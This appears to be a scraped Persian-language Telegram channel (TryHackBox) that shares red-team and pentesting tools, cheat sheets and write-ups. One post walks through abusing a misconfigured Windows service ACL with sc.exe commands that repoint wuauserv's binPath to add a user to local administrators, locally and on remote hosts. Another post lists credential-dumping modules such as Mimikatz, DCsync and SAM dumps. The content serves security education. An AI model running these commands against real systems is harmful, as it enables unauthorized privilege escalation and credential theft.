Try Hack Box
5.9K subscribers
685 photos
65 videos
125 files
692 links
1 Nov 2020
1399/08/11
آموزش تست نفوذ و ردتیم

https://linkedin.com/company/tryhackbox-org/

یوتیوب
https://youtube.com/@tryhackbox

کانال ها :
@TryHackBoxOfficial ( نقشه راه )
@TryHackBoxStory ( اخبار و داستانهای هک )
پشتیبانی : @ThbxSupport
Download Telegram
Parrot Security Edition
یک سیستم عامل خاص است که برای تست نفوذ و عملیات #RedTeam طراحی شده است. این شامل زرادخانه کاملی از ابزارهای آماده برای استفاده است .

https://www.parrotsec.io/

#OS #linux #pentesting #parrot
@TryHackBox
🔥1
یک محیط مجازی با سیستم عامل های واقع گرایانه و آسیب پذیری های مختلف برای  تیم های قرمز

این مطالب برای تیم قرمز، تیم آبی، نفوذگران و متخصصان امنیت اطلاعات بسیار مفید خواهد بود.

https://github.com/Marshall-Hallenbeck/red_team_attack_lab


#RedTeam
@TryHackBox
@TryHackBoxOfficial
🔥3
🧰 NetExec
یک ابزار حمله شبکه مبتنی بر CrackMapExec است که به طور فعال توسط جامعه ای از علاقه مندان پشتیبانی می شود. این ابزار حملات علیه LDAP، SMB، Kerberos، FTP و بسیاری از پروتکل ها/سرویس های دیگر را بسیار ساده می کند.

👉 GitHub & Wiki

#tools #pentest #redteam
@TryHackBox
🗄Microsoft SQL DBMS
اغلب می‌توان در طول پنت‌ست زیرساخت‌های داخلی ویندوز یافت، بنابراین مهم است که یک زنجیره ابزار با کیفیت بالا در دسترس داشته باشید. دو ابزار را بگیرید که به شما امکان می دهد حملات زیر را انجام دهید.

1. Enumeration Techniques
2. Authentication Providers
3. Using Standard Modules
4. Using Linked Modules
5. Using Impersonation Modules
6. Using SCCM Modules
7. Contributing and Extending SQLRecon
8. Hardening your SQL Server Environment

SQLRecon
PySQLRecon

#tools #pentest #redteam
@TryHackBox
🔥2
دایرکتوری های مهم ویندوز برای کارشناسان امنیتی، تحلیلگران SOC و متخصصان تیم قرمز.

#tips #redteam #soc
@TryHackBox
@TryHackBoxOfficial
👍5
ابزار OWASP OFFAT به طور مستقل API شما را از نظر آسیب پذیری های رایج ارزیابی می کند، اگرچه سازگاری کامل با OAS v3 در انتظار است. این پروژه همچنان یک کار در حال پیشرفت است و به طور مداوم به سمت تکمیل در حال پیشرفت است

https://github.com/OWASP/OFFAT

#pentest #redteam
@TryHackBox
🔐 CVE-2024-21111
- افزایش دسترسی لوکال در Oracle VirtualBox

یک نوشته دقیق که از طریق آن نحوه کشف و بهره برداری از یک آسیب پذیری در نرم افزار کراس پلتفرم محبوب اوراکل را خواهید آموخت

https://www.mdsec.co.uk/2024/04/cve-2024-21111-local-privilege-escalation-in-oracle-virtualbox/
#pentest #writeup #redteam
@TryHackBox
🏭 اگر درگیر تست نفوذ هستید، ممکن است اغلب کنترل‌کننده‌های منطقی قابل برنامه‌ریزی (PLC)، دستگاه‌هایی که برای کنترل پروسس های صنعتی استفاده می‌شوند، در زیرساخت داخلی کلاینت پیدا کنید.

🧰 به نظر می رسد که مایکروسافت یک چارچوب منبع باز برای پزشکی قانونی چنین دستگاه هایی، به طور دقیق تر، برای تجزیه و تحلیل ابرداده و فایل های پروژه PLC دارد.

✔️ این یک راه راحت برای اسکن PLC ها و شناسایی هر گونه مصنوعات مشکوک در محیط های ICS ارائه می دهد که می تواند برای بازرسی دستی، وظایف نظارت خودکار، یا عملیات پاسخ به حادثه برای شناسایی دستگاه های در معرض خطر استفاده شود. و بله، می توان آن را مطابق با نیازهای شما سفارشی کرد.

👩‍💻 GitHub

#pentest #redteam #tools
@TryHackBox
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
دستورات مهم لینوکس: برای تحلیلگر SOC توجه داشته باشید

#incedentresponse #redteam #infosec #SOC #linux
@TryHackBox
👍3
💡 برگه تقلب اکتیو دایرکتوری
- مخزنی که در آن یک متدولوژی کلی برای کار در اکتیو دایرکتوری پیدا خواهید کرد. Inside مجموعه ای از دستورات سریع از مؤثرترین ابزارهای مبتنی بر Powershell، C، .Net 3.5 و .Net 4.5 است.

🥷 مخزن به روزترین نیست، اما برای مبتدیان عالی است که اصول را درک کنند.

• Recon
• Domain Enum
• Local Privilege Escalation
• Local Account Stealing
• Monitor Potential Incoming Account
• Local Account Stealing
• Admin Recon
• Lateral Movement
• Remote Administration
• Domain Admin Privileges
• Cross Trust Attacks
• Persistance and Exfiltrate

👉 GitHub

#redteam #pentest #cheatsheet
@TryHackBox
🖥 مخزن: Vuls – اسکنر آسیب پذیری

Vuls
یک اسکنر آسیب‌پذیری منبع باز برای Linux، FreeBSD، Container، WordPress، کتابخانه‌های زبان برنامه‌نویسی، دستگاه‌های شبکه است که در Go نوشته شده است.

- این ابزار تجزیه و تحلیل آسیب پذیری های نرم افزار نصب شده بر روی سیستم را خودکار می کند ، که انجام دستی در یک محیط تولید بسیار دشوار است.

https://github.com/future-architect/vuls?tab=readme-ov-file

#Web #Redteam #Recon
@TryHackBox
پیکربندی ناامن ACL های سرویس از طریق group policies

سیاست های گروه ابزار محبوبی برای مدیریت متمرکز زیرساخت های مبتنی بر Active Directory هستند. ابزار Group3r به شما امکان می دهد اطلاعاتی را از سیاست های گروه برای تجزیه و تحلیل بعدی جمع آوری کنید. Group3r همچنین برخی از تنظیمات نادرست را برجسته می کند، بنابراین جستجو با استفاده از کلمات کلیدی red و black برای شناسایی مهم ترین نقص ها راحت است. پست امروز درباره پیکربندی ناامن ACL های سرویس از طریق گروپ پالیسی است.

پس از راه اندازی Group3r و بررسی نتایج، خطوط زیر را یافتیم:
A Windows service's ACL is being configured to grant abusable permissions to a target trustee. This should allow local privilege escalation on affected hosts. Service: wuauserv, Trustee: Authenticated Users - S-1-5-11 .

اگر به خود Group Policy بروید، نام سرویس، نوع راه اندازی و تنظیمات حقوق دسترسی را در قالب یک رشته SSDL پیدا می کنیم:
"wuauserv",4,"D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

ما فقط به گروه AU علاقه مندیم:

- CC -
حقوق درخواست پیکربندی سرویس.
- DC -
حقوق تغییر سرویس.
- LC -
حقوق درخواست وضعیت سرویس ها؛
- SW -
حقوق فهرست کردن تمام خدمات وابسته به سرویس
- RP - حقوق شروع سرویس؛
- WP - حقوق توقف سرویس؛
- DT - حقوق توقف سرویس.
- LO – حقوقی که به شما امکان می دهد از سرویس بخواهید فورا وضعیت شما را گزارش کند.
- CR - حقوق تعیین کد کاربر عنصر کنترل.
- RC - حقوق خواندن توصیفگرهای امنیتی.

ابتدا باید تعیین کنید که این خط مشی گروه روی کدام کامپیوترها اعمال می شود.

MATCH(g:GPO {name:"[email protected]"})-[:GPLink|Contains*1..]->(c:Computer) RETURN c.name


اگر میزبان فعلی ما یا میزبانی که به آن دسترسی راه دور داریم این خط مشی را اعمال می کند، پیکربندی سرویس فعلی را در رایانه محلی پرس و جو می کنیم:
sc.exe qc wuauserv

ما مقدار فعلی پارامتر BINARY_PATH_NAME را برای بازیابی بعدی ذخیره می کنیم.
ما پارامتر BINARY_PATH_NAME را به کاری که می‌خواهیم در رایانه انجام دهیم تغییر می‌دهیم، برای مثال، خود را به گروه مدیران لوکال یا local administrators اضافه می‌کنیم.

sc.exe config wuauserv binPath= "net.exe localgroup administrators victim /add"

سرویس را شروع کنید:
sc.exe start wuauserv

اگر سرویس راه اندازی شده است، ابتدا باید آن را متوقف کنید و سپس آن را شروع کنید:
sc.exe stop wuauserv
sc.exe start wuauserv


در حالی که Group3r گزارش می دهد که این نقص می تواند برای افزایش دسترسی لوکال استفاده شود، در برخی موارد می توان از آن برای افزایش دسترسی از راه دور و lateral movement نیز استفاده کرد.

ما یک بررسی ساده انجام می دهیم، مانند راه اندازی یا نصب یک سرویس در یک میزبان راه دور:
sc.exe \\server start wuauserv

اگر خطای Access Denied ظاهر نشد، بیایید سعی کنیم خود را به گروه مدیران لوکال اضافه کنیم و سرویس را راه اندازی کنیم:
sc.exe \\server config wuauserv binPath= "net.exe localgroup administrators victim /add"
sc.exe \\server start wuauserv

پس از به دست آوردن دسترسی  local administrator، پارامتر BINARY_PATH_NAME را به حالت اولیه خود برگردانید.

#RedTeam #PurpleTeam #LPE
@TryHackBox
👍5🔥3
⚒️ SigmaPotato
- ابزار افزایش دسترسی SeIpersonate برای Windows 8-11 و Windows Server 2012-2022 با پشتیبانی پیشرفته از PowerShell و بازتاب .NET

👉 GitHub
#redteam #tools
@TryHackBox
👍4
Forwarded from P.F.K Security
Media is too big
VIEW IN TELEGRAM
در این جلسه، تمرکز بر روی تاکتیک‌های تیم قرمز (Red Team) در زمینه اینترنت اشیاء (IoT) است. در ابتدا، اشاره می‌شود که دستگاه‌های روزمره مانند توسترها و توالت‌ها که نباید به اینترنت متصل شوند، در این بحث گنجانده نمی‌شوند. سخنران که یک تحلیل‌گر امنیتی در Black Hills Information Security است، بر اهمیت یادگیری و آموزش تکنیک‌های هک تأکید می‌کند.
توضیحات این ویدئو ادامه دارد در پایین بخوانید .
#RedTeam
@PfkSecurity
قسمت سوم زیرو تاک
@RadioZeroPod | @TryHackBox
قسمت سوم زیرو تاک - بخش دوم

🔶 مهندس سهیل هاشمی  - با محوریت
RedTeam

💢 مفاهیم تخصصی ردتیم

🟠 4. تعریف ردتیم
🟠 5. مقایسه تیم‌های امنیتی
🟠 6. ردتیم در مقابل تست نفوذ کلاسیک

💢 بخش سوم: عملیات ردتیم

🔴 7. مراحل اصلی عملیات ردتیمینگ
🔴 8. روایت واقعی از مهندسی اجتماعی
🔴 9. چالش‌های سازمانی
🔴 10. شاخص‌های موفقیت

💢 بخش چهارم: آینده و توسعه فردی

🟡 11. تأثیر هوش مصنوعی و یادگیری ماشین
🟡 12. رودمپ پیشنهادی برای شروع
🟡 13. آماده‌سازی محیط آزمایشگاهی

🔶️ در نهایت سوالاتی از جانب شرکت‌کنندگان پرسیده شد و مهندس به آن مفصلا جواب داد.

🎤 راهبر گفتگوی امنیتی : حسین نائیجی
#بخش_دوم #RedTeam
@RadioZeroPod
@TryHackBox
6👍41
C2Matrix TryHackBox.xlsx
94.3 KB
🔖 چگونه یک فریم ورک C2 انتخاب کنیم ؟

پس از اتمام این کتاب، ممکن است سوالاتی براتون پیش بیاد و امیدواریم یکی از آن‌ها این باشد: «چگونه بدونم کدوم فریم ورک C2 رو برای عملیات‌های تیم قرمز خود انتخاب کنم؟» پاسخ درست یا غلطی برای این سوال وجود ندارد، فقط چند سوال کلی که ابتدا باید به آن‌ها پاسخ بدید :

اهداف شما چیست؟
آیا بودجه‌ای دارید؟
آیا به چیزی بسیار قابل تنظیم نیاز دارید؟
آیا از Evasion آنتی‌ویروس‌های آماده (Off-the-shelf AV Evasion) ضروری است؟
آیا نیاز دارید که بتوانید ماژول‌ها/اسکریپت‌های خودتان را ایجاد کنید؟
آیا گزارش‌گیری داخلی برای شما ضروری است؟

سپس باید این اطلاعات را به فایل xlsx گسترده C2 Matrix ببرید و انتخاب خود را بر اساس سوالات بالا محدود کنید. اگر یک فریم ورک C2 پریمیوم پیدا کردید که معیارهای شما را برآورده می‌کند، به شدت توصیه می‌شود که درخواست یک نسخه آزمایشی/ارزیابی کنید تا ببینید آیا آن فریم ورک C2 برای شما بهترین گزینه است یا خیر.

مطالب بخشی از کتاب ردتیم ما که در حال آماده شدن است .

@TryHackBox | #RedTeam
5👍4👎1
ابزار ADKAVEH: شبیه‌سازی حملات و شناسایی در Active Directory با PowerShell

ADKAVEH یک اسکریپت PowerShell است که به تیم‌های امنیتی امکان شبیه‌سازی حملات و شناسایی در محیط‌های Active Directory را می‌دهد. این ابزار شامل ماژول‌هایی برای شبیه‌سازی حملاتی مانند Kerberoasting، AS-REP Roasting، Password Spraying و تست‌ های اختیاری برای غیرفعال‌سازی Windows Defender است.

https://github.com/TryHackBox/ADKAVEH

#tools #AD #RedTeam
@KavehOffSec
@TryHackBox
6
#redteam #security

🔐 Weakpass
— یکی از بزرگ‌ترین مجموعه‌ های دیکشنری‌ های پسورد برای اهداف مختلف: از تست نفوذ تا افزایش امنیت پسوردها.

از ویژگی‌های جدید موجود می‌توان به موارد زیر اشاره کرد:

• API
برای ساده‌سازی استفاده از سرویس.
• دیکشنری‌های پیش‌محاسبه شده برای MD5، NTLM، SHA1 و SHA256.
• امکان جستجو بر اساس هش‌های MD5، NTLM، SHA1 و SHA256.
• قابلیت تولید پسورد.
https://weakpass.com/
@TryHackBox
4👌3
🔖 PsMapExec v0.9.0

یک به ‌روزرسانی برای ابزار post-exploitation در Active Directory که با PowerShell نوشته شده منتشر شد.

به روز رسانی

پشتیبانی از چند دامنه

بهبود عملکرد از طریق Proxifier / تونل‌های SSH

امکان روشن/خاموش کردن RDP
ماژول‌های جدید:

EventCreds


ماژول ‌های اضافی در LDAP:
GMSA
ConstrainedDelegation
UnconstrainedDelegation
AdminCount
ComputerSIDs
UserDescriptions
UserLogonRestrictions
UserPasswords
UserSIDs

روش‌ها (پروتکل) فعلی که پشتیبانی می‌شوند:
RDP
SessionHunter
SMB
SMB Signing
LDAP / LDAPS
SSH
Spraying
VNC
WinRM
WMI
MSSQL
Kerberoast

ماژول ‌های پیاده ‌سازی ‌شده:
Amnesiac — اجرای payloadهای Amnesiac C2
ConsoleHistory — تاریخچه در PowerShell
Files — فایل‌ها در دایرکتوری‌های متداول
KerbDump — دامپ تیکت‌های Kerberos
eKeys — دامپ کلیدها (Mimikatz)
LogonPasswords — دامپ پسوردهای لاگ‌آن (Mimikatz)
LSA — دامپ LSA (Mimikatz)
NTDS — پیاده‌سازی DCsync
SAM — دامپ SAM


https://viperone.gitbook.io/pentest-everything/psmapexec

@TryHackBox
#PowerShell #pentest #redteam #psmapexec
3👍3
SE in Red Teaming by THB Team.pdf
1.2 MB
🔖 مهندسی اجتماعی در ردتیمینگ

این راهنمای خلاصه و عملی یک مرجع کاربردی برای طراحی و اجرای سناریوهای اجتماعی‌ مهندسی در عملیات‌های ردتیم است:

تاثیرات مهندسی اجتماعی
تکنیک های رایج مهندسی اجتماعی
ابزارها و تکنیک ها
ابزارهای اوسینت

⚠️ این آموزش صرفاً برای ارتقای امنیت و آگاهی سایبری است و هیچ استفادهٔ غیرمجاز از آن مجاز نیست

⭕️ شما کدام تکنیکِ مهندسی اجتماعی (فیشینگ، pretexting، یا baiting) رو بیش از همه برای سناریوهای ردتیم مؤثر می‌دونید؟ نظر خودتون رو بنویسید.


@TryHackBox | Github | YouTube | Group
#SE #RedTeam
#مهندسی_اجتماعی
🔥9